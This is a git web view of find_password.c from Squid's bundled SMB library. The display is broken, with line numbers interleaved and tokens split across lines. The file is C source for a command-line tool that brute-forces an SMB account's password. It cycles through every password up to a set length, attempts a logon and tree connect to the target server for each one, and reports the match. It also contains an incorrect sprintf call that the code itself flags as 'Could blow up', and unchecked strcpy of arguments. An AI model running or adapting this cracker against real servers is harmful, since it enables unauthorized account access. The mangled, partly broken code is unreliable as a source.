]>
git.ipfire.org Git - thirdparty/squid.git/blob - lib/smblib/find_password.c
2 * Copyright (C) 1996-2017 The Squid Software Foundation and contributors
4 * Squid software is distributed under GPLv2+ license and includes
5 * contributions from numerous individuals and organizations.
6 * Please see the COPYING and CONTRIBUTORS files for details.
10 /* Find passwords ... */
11 /* We do it in a brute force way ... Cycle through all the possible passwords
12 sending a logon to see if all it works ... We have to wait for any timeout
13 the the server implements before we try the next one. We could open lots
14 of connections to the server and then send the logon request and not wait
15 for the reply. This would allow us to have lots of outstanding attempts at
18 #include <sys/types.h>
24 #include "smblib/smblib.h"
29 char *SMB_Prots
[] = {"PC NETWORK PROGRAM 1.0",
30 "MICROSOFT NETWORKS 1.03",
31 "MICROSOFT NETWORKS 3.0",
43 fprintf(stderr
,"Usage: find_password -u <user> -l <pwd-len-max> server\n");
46 /* figure out next password */
48 static int pwinit
= FALSE
, pwpos
= 0;
50 int next_password(char *pw
, int pwlen
)
55 if (pwinit
== FALSE
) {
58 memset(pw
, 0, pwlen
+ 1);
69 /* If it has wrapped around, then inc to 1 and carry up the chain */
76 if (i
< 0) { /* If we went off the end, increment pwpos */
79 if (pwpos
>= pwlen
) return(FALSE
); /* No more passwords */
93 static char pwd_str
[1024]; /* Where we put passwords as we convert them */
95 char *print_password(char * password
)
103 for (i
= 0; i
< strlen(password
); i
++) {
105 if (((unsigned)password
[i
] <= ' ') || ((unsigned)password
[i
] > 127)) {
108 snprintf(temp
, sizeof(temp
)-1, "%03i", (int)password
[i
]);
109 strcpy(&pwd_str
[j
+ 1], temp
);
110 j
= j
+ 3; /* Space for \ accounted for below */
113 pwd_str
[j
] = password
[i
];
119 pwd_str
[j
] = 0; /* Put a null on the end ... */
125 main(int argc
, char *argv
[])
131 int opt
, error
, SMB_Error
, err_class
, err_code
, pwlen
, tries
= 0;
132 char server
[80], service
[80], service_name
[160], password
[80], username
[80];
133 char old_password
[80], err_string
[1024];
136 strncpy(service
, "IPC$", sizeof(service
) - 1);
142 while ((opt
= getopt(argc
, argv
, "s:u:l:v")) != EOF
) {
147 strcpy(service
, optarg
);
150 case 'u': /* Pick up the user name */
152 strncpy(username
, optarg
, sizeof(username
) - 1);
155 case 'l': /* pick up password len */
157 pwlen
= atoi(optarg
);
160 case 'v': /* Verbose? */
173 if (optind
< argc
) { /* Some more parameters, assume is the server */
174 strncpy(server
, argv
[optind
], sizeof(server
) - 1);
177 strcpy(server
, "nemesis");
180 if (verbose
== TRUE
) { /* Print out all we know */
182 fprintf(stderr
, "Finding password for User: %s, on server: %s\n",
184 fprintf(stderr
, "with a pwlen = %i\n", pwlen
);
188 SMB_Init(); /* Initialize things ... */
190 /* We connect to the server and negotiate */
192 con
= SMB_Connect_Server(NULL
, server
);
194 if (con
== NULL
) { /* Error processing */
196 fprintf(stderr
, "Unable to connect to server %s ...\n", server
);
198 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
200 SMB_Error
= SMB_Get_Last_SMB_Err();
201 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
202 SMBlib_Error_Code(SMB_Error
),
204 sizeof(err_string
) - 1);
207 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
210 printf(" %s\n", err_string
);
215 /* We need to negotiate a protocol better than PC NetWork Program */
217 if (SMB_Negotiate(con
, SMB_Prots
) < 0) {
219 fprintf(stderr
, "Unable to negotiate a protocol with server %s ...\n",
222 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
224 SMB_Error
= SMB_Get_Last_SMB_Err();
225 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
226 SMBlib_Error_Code(SMB_Error
),
228 sizeof(err_string
) - 1);
231 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
234 printf(" %s\n", err_string
);
239 sprintf(service_name
, sizeof(service_name
)-1, "\\\\%s\\%s", server
, service
); /* Could blow up */
241 /* Now loop through all password possibilities ... */
243 memset(password
, 0, sizeof(password
));
245 while (next_password(password
, pwlen
) == TRUE
) {
247 if ((tree
= SMB_Logon_And_TCon(con
,
251 service_name
, "?????")) == NULL
) {
253 if (verbose
== TRUE
) { /* Lets hear about the error */
255 fprintf(stderr
, "Unable to logon and tree connect to server %s ...\n",
257 fprintf(stderr
, "With username: %s, and password: %s\n",
258 username
, print_password(password
));
260 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
262 SMB_Error
= SMB_Get_Last_SMB_Err();
263 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
264 SMBlib_Error_Code(SMB_Error
),
266 sizeof(err_string
) - 1);
269 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
272 printf(" %s\n", err_string
);
275 } else { /* Password match */
277 fprintf(stderr
, "Logged in with password:%s\n",
278 print_password(password
));
288 fprintf(stderr
, "Passwords exhausted.");